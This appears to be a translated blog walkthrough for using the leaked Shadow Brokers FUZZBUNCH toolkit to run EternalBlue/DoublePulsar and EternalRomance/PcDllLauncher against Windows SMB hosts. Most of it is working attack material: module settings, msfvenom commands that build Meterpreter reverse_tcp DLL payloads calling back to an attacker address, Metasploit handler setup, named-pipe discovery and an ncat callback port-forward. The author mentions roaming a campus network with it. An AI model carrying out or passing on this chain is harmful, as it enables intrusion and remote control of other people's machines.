The Shadow Brokers' Big Gun

Spent two days on it, worked out a more or less usable routine, and roamed around the campus network for a bit.

Environment requirements: python2.6 + the pywin32 extension package

Add the matching DLL directory under windows/lib/ to the system environment variables, and also copy pytrch.py and _pytrch into Python's package directory; otherwise running fb.py will throw an error.

Then run fb.py

Two usable routines:

Eternalblue + Doublepulsar

use Eternalblue

Fill in the corresponding IP and port information as prompted along the way.

The part to watch out for is here:
[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

Then just confirm all the way through and it's OK.

use Doublepulsar

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.168.55.50
TargetPort            445
DllPayload            G:\go_64.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x64
Function              RunDLL

A note here on how this dll was generated:

# target is a 32-bit system
msfvenom -p windows/meterpreter/reverse_tcp \
    LHOST=10.170.4.114 \
    LPORT=8888 \
    -f dll > go.dll

# target is a 64-bit system
msfvenom -p windows/x64/meterpreter/reverse_tcp \
    LHOST=10.170.4.114 \
    LPORT=8888 \
    -f dll > go.dll

# LHOST and LPORT are the address and port of the machine the target connects back to
# also distinguish 32-bit from 64-bit when doing set payload in msf:
msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.170.4.114
LHOST => 10.170.4.114
msf exploit(handler) > set LPORT 8888
LPORT => 8888

# then just run
# note: get the handler running first, then execute from the fb.py side

Eternalromance + Pcdlllauncher

use Eternalromance

...
..
.

Module: Eternalromance
======================

Name                 Value
----                 -----
NetworkTimeout       60
TargetIp             10.168.55.50
TargetPort           445
PipeName
CallbackIp           10.170.4.114
CallbackPort         45213
CallbackLocalPort    45213
ExploitMethod        Default
Credentials          Anonymous
Protocol             SMB
Target               SERVER_2008R2_SP0
Payload              Callback


# Problem encountered:

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Running Exploit
[*] Initializing Parameters
[-] Error - Unsupported pipe name
[-] Error 45 (processParams)
[!] Plugin failed
[-] Error: Eternalromance Failed
fb Exploit (Eternalromance) >

# At this point you have to go find a usable pipename:

fb Exploit (Eternalromance) > use Namedpipetouch

[!] Entering Plugin Context :: Namedpipetouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.168.55.50

fb Touch (Namedpipetouch) > set

Module: Namedpipetouch
======================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          10.168.55.50
TargetPort        445
Protocol          SMB

fb Touch (Namedpipetouch) > execute

...
...
...


[*] Summary: 1 pipes found
        OS Pipe: lsass rpc - \PIPE\lsarpc
[+] Namedpipetouch Succeeded

# Then just use this pipe, or restart fb.py

# After it succeeds, use Pcdlllauncher

use Pcdlllauncher

Module: Pcdlllauncher
=====================

Name                    Value
----                    -----
ConnectedTcp
XorMask                 0
NetworkTimeout          60
LPFilename              D:\DSZOpsDisk\Resources\Pc\Legacy\PC_Exploit.dll
LPEntryName             ServiceEntry
ImplantFilename
TargetOsArchitecture    x86
PCBehavior              8

# LPFilename: search for the location of PC_Exploit.dll and fill it in
# ImplantFilename is the go.dll or go_64.dll from the previous routine
# Once the parameters are configured, listen on the msf side.

More

One more fairly important thing: because the XP machines all run inside virtual machines, the CallBack here needs a port forward. There are many ways to do port forwarding; ncat is recommended:

ncat --sh-exec "ncat 192.168.56.102 45213" -lkp 45213

where 192.168.56.102 is the virtual machine's IP.
